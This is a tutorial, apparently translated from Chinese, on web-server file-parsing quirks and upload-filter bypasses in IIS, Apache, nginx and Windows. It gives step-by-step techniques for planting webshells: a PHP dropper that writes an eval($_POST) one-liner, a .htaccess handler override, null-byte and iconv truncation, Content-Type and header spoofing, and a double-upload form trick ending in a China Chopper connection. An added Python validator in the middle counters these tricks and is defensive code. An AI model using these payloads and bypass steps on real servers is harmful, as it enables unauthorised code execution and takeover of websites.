1.2 File parsing and file upload vulnerabilities

A discussion of file parsing and file upload vulnerabilities.

File parsing vulnerabilities

Parsing vulnerabilities arise when IIS, Apache, nginx or a similar server, under certain conditions, interprets a file that is not a script (an uploaded image, for example) as a script type and executes it.

IIS 5.x/6.0 parsing vulnerabilities

IIS 6.0 has three main parsing vulnerabilities:

1. Directory parsing: /xx.asp/xx.jpg
   If a directory whose name ends in .asp or .asa exists under the web root, IIS parses and executes every file inside it as ASP, whatever its extension. An attacker who can upload into such a directory therefore only needs to upload the image itself; no change of suffix is required.
2. File parsing: xx.asp;.jpg
   IIS 6.0 stops reading the file name at the semicolon, so xx.asp;.jpg is executed as an ASP script.
3. File type parsing: asa/cer/cdx
   Besides .asp, IIS 6.0 also executes .asa, .cer and .cdx files by default.

Apache parsing vulnerability

Apache reads a file name's extensions from right to left; if the rightmost extension is not a type it knows how to handle, it moves left to the next one. A file named xx.php.wer.xxxxx is therefore handled as PHP.

IIS 7.0 / Nginx <8.03 malformed parsing vulnerability

With the default Fast-CGI configuration enabled, upload a file named xx.jpg whose content is:

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

Requesting xx.jpg/.php then causes the image to be run as PHP, which writes the one-line webshell shell.php into the same directory.

Nginx <8.03 null byte code execution vulnerability

Affected nginx versions: 0.5.*, 0.6.*, 0.7 <= 0.7.65, 0.8 <= 0.8.37. When PHP is run through PHP-FastCGI, nginx and FastCGI disagree about where the URL ends once it contains a %00 null byte, so PHP code embedded in an image can be executed by requesting xxx.jpg%00.php.
A second nginx file-name issue is left-to-right parsing, which both bypasses suffix restrictions and allows a webshell to be uploaded (worth trying when the other approaches fail), for example:
Content-Disposition: form-data; name="userfiles"; filename="XXX.jpg.php"
 

htaccess file parsing

If Apache honours .htaccess files and they can be uploaded, try writing this into .htaccess:

<FilesMatch "shell.jpg"> SetHandler application/x-httpd-php </FilesMatch>

Then upload the webshell as shell.jpg; Apache will now parse shell.jpg as a PHP file.

Operating system parsing

Windows strips trailing spaces and dots from file names. If upload validation uses a blacklist (for example, .php files are not allowed) and the server runs Windows, uploading xx.php followed by a space, or xx.php followed by a dot, bypasses the blacklist check, because the file is stored as xx.php.

 

File upload vulnerabilities

File header spoofing

Prepending GIF89a to a one-line webshell and saving it with an image extension can fool a simple WAF that only inspects the file header.

filepath vulnerability

The filepath vulnerability is mainly used to defeat the server's automatic file-naming rules. There are two main ways to use it:

1. Change the path the file is saved to (filepath); combined with the directory parsing vulnerability above, use the path /x.asp/
2. Change the file name directly (this is also done in the filepath field), using the path /x.asp;.

%00 truncation

Two ways to exploit %00 truncation:

1. Change the filename to xx.php .jpg and, in Burp Suite, change the hex 20 of the space to 00.
2. Change the filename to xx.php%00.jpg and, in Burp Suite, right-click the %00 and choose Convert → URL → URL-decode.

filetype vulnerability

The filetype vulnerability targets the Content-Type field. There are two main ways to exploit it:

1. First upload an image, then change content-type: images/jpeg to content-type: text/asp, apply 00 truncation to the filename, and replace the image content with a one-line webshell.
2. Capture the POST upload directly with Burp and change Content-Type: text/plain to Content-Type: image/gif.

iconv function upload restriction

If you find that whatever file you upload, the stored file always has a .jpg suffix appended, suspect that the upload is being restricted with the iconv function. A method similar to 00 truncation applies, except that here the truncation byte is not 00 but a value in the range 80 to EF: change the hex of the relevant byte to any value from 80 to EF. If iconv really is in use, congratulations, any file can be uploaded. For example, upload xx.php followed by a space, capture the request, and change the hex of that trailing space to any value from 80 to EF.
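A defensive counterpart to the tricks listed in the parsing and upload sections above: an added Python example, not code from the original page, that applies layered server-side checks to an uploaded file name and body, treats every known truncation character as an extension boundary so hidden segments are still inspected, and assigns accepted files a server-generated name. The extension sets, magic-byte values and tag list are assumptions chosen for illustration.

```python
import secrets

# Extensions the servers discussed above may execute, including the IIS 6
# defaults asa/cer/cdx. Apache walks extensions right-to-left and IIS 6 stops
# at ';', so an executable segment anywhere in the name is grounds to refuse.
EXECUTABLE_EXTS = {"php", "php3", "php5", "phtml", "asp", "aspx", "asa",
                   "cer", "cdx", "jsp", "htaccess"}
ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif"}
# Leading bytes per type; the Content-Type header is client-controlled and ignored.
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
         "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}
SCRIPT_TAGS = (b"<?php", b"<%", b"<script")


def reject_reasons(filename: str, content: bytes) -> list:
    """Return every reason an upload must be refused (empty list = accept)."""
    reasons = []
    # %00 / raw null: the nginx and filename-field truncation tricks above.
    if "\x00" in filename or "%00" in filename.lower():
        reasons.append("null byte")
    # Bytes 0x80-0xEF (the iconv truncation trick) and other control characters.
    if any(not 0x20 <= ord(c) <= 0x7e for c in filename):
        reasons.append("non-printable or non-ASCII character")
    # "/x.asp/" directory-parsing paths and the IIS 6 "xx.asp;.jpg" form.
    if any(ch in filename for ch in "/\\;"):
        reasons.append("path separator or semicolon")
    # Windows drops trailing dots and spaces, so "xx.php." is stored as xx.php.
    if filename != filename.rstrip(". "):
        reasons.append("trailing dot or space")
    norm = filename.lower().rstrip(". ")  # the name as Windows would store it
    for sep in (";", "%00", "\x00"):  # truncation points become extension boundaries
        norm = norm.replace(sep, ".")
    exts = norm.split(".")[1:]
    if not exts or exts[-1] not in ALLOWED_EXTS:
        reasons.append("extension not allowed")
    if any(e in EXECUTABLE_EXTS for e in exts):
        reasons.append("executable extension in name")
    # A "GIF89a" prefix satisfies a magic check on its own, so also look for
    # script open tags; re-encoding the image server-side is the stronger fix.
    expected = MAGIC.get(exts[-1]) if exts else None
    if expected is None or not content.startswith(expected):
        reasons.append("magic bytes do not match extension")
    if any(tag in content for tag in SCRIPT_TAGS):
        reasons.append("script tag in body")
    return reasons


def stored_name(filename: str, content: bytes) -> str:
    """Server-generated name for an accepted upload; the client name is never reused."""
    reasons = reject_reasons(filename, content)
    if reasons:
        raise ValueError("rejected: " + ", ".join(reasons))
    return secrets.token_hex(16) + "." + filename.lower().rsplit(".", 1)[1]
```

Rejecting on any single reason is deliberate: each check covers a different server's parsing quirk, and the GIF89a case shows why the magic-byte check alone would still pass a spoofed header.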

Double file upload

At the upload page, right-click → Inspect Element, first change the form's action to the full URL, then copy and paste the file-browse input (<input ......) so that two upload boxes appear; choose a normal file in the first and the one-line webshell in the second, then submit. (Reference link)

Below is an upload address:

Right-click → View source and change the code in two places:

After modification:

Save as 1.html

Choose a normal jpg image for the first upload and our shell for the second.
asp is filtered here, so I chose cdx.

Breakthrough succeeded.
Right-click → View source

Connect with 菜刀 (China Chopper):

Form submit button

Sometimes a scan reveals an upload path, but the page has only a file-browse control and no submit button; in that case we need to add a submit button ourselves.
Adding it to the form:
Press F12 (Inspect Element) and add the submit-button code below the file-selection input:
<input type="submit" value="提交" name="xx">
 
